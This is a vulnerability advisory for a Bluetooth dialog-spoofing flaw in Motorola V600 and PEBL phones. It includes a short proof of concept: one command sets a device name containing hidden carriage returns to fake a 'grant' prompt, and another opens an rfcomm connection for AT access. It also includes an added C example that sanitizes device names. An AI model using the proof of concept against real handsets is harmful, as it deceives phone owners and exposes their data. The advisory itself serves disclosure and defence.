Motorola Bluetooth Interface Dialog Spoofing Vulnerability
BID:17190
Info
| Bugtraq ID: | 17190 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 22 2006 12:00AM |
| Updated: | Mar 22 2006 07:39PM |
| Credit: | Discovered by Kevin Finisterre. |
| Vulnerable: | Motorola V600; Motorola PEBL U6 |
| Not Vulnerable: | |
Discussion
Motorola mobile handsets are prone to a dialog-spoofing vulnerability when accepting Bluetooth communications. An attacker could exploit this issue to trick a user into granting them AT access to the device. The attacker could then gather confidential information from the handset.
Motorola PEBL and V600 handsets are vulnerable to this issue; other devices may also be affected.
Exploit / POC
The following proof of concept is available:
# hciconfig hci0 name `perl -e 'print "Press\x0dgrant\x0dto\x0ddisable\x0dmute\x0d\x0d"'`
# rfcomm connect 0 00:15:A8:74:87:3E 3 (wait for user to press grant)
Connected /dev/rfcomm0 to 00:15:A8:74:87:3E on channel 3
Press CTRL-C for hangup
Solution / Fix
Solution:
Motorola has reportedly addressed this issue, but Symantec has not confirmed this. Please contact the vendor for more information.
Currently we are not aware of any vendor-supplied patches for this issue.
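The proof of concept works because the remote device name, carriage returns included, is drawn inside the authorization dialog. The C sketch below is an added illustration of the missing input validation, not part of the advisory and not Motorola's fix: it renders the name as one quoted line of printable ASCII and warns when the name had to be altered. The function names, NAME_DISPLAY_MAX and the dialog wording are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define NAME_DISPLAY_MAX 32   /* assumed dialog limit, not a Motorola value */

/* Copy an attacker-controlled remote device name into out as one line of
 * printable ASCII. Any other byte (such as the 0x0D in the proof of concept)
 * and the '"' delimiter become '?'. Returns the number of bytes replaced or
 * cut off (0 = shown verbatim), or -1 if out has no room at all. */
int sanitize_remote_name(const unsigned char *name, size_t len,
                         char *out, size_t out_size)
{
    size_t n = 0;
    int changed = 0;
    if (out_size == 0) return -1;
    for (size_t i = 0; i < len; i++) {
        if (n >= NAME_DISPLAY_MAX || n + 1 >= out_size) {
            changed += (int)(len - i);          /* truncated tail */
            break;
        }
        int ok = name[i] >= 0x20 && name[i] <= 0x7E && name[i] != '"';
        out[n++] = ok ? (char)name[i] : '?';
        changed += !ok;
    }
    out[n] = '\0';
    return changed;
}

/* Build the dialog text: fixed wording first, remote name quoted on one
 * line, and a warning whenever the name had to be altered. */
int build_grant_prompt(const unsigned char *name, size_t len,
                       char *out, size_t out_size)
{
    char shown[NAME_DISPLAY_MAX + 1];
    int changed = sanitize_remote_name(name, len, shown, sizeof shown);
    snprintf(out, out_size, "Bluetooth device \"%s\" requests access.%s",
             shown, changed ? " Warning: name altered for display." : "");
    return changed;
}

int main(void)
{
    /* Constructed sample: the device name set in the proof of concept. */
    static const unsigned char poc[] = "Press\rgrant\rto\rdisable\rmute\r\r";
    char prompt[160];
    build_grant_prompt(poc, sizeof poc - 1, prompt, sizeof prompt);
    puts(prompt);
    return 0;
}
```

Restricting the name to printable ASCII is a simplification; a handset that must show non-ASCII names would instead validate UTF-8 and filter line and format separators.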
References
References:
- Motorola PEBL (Motorola)
- Motorola V600 (Motorola)
- DMA[2006-0321a] - 'Motorola P2K Platform setpath() overflow and Blueline attack' (KF (lists))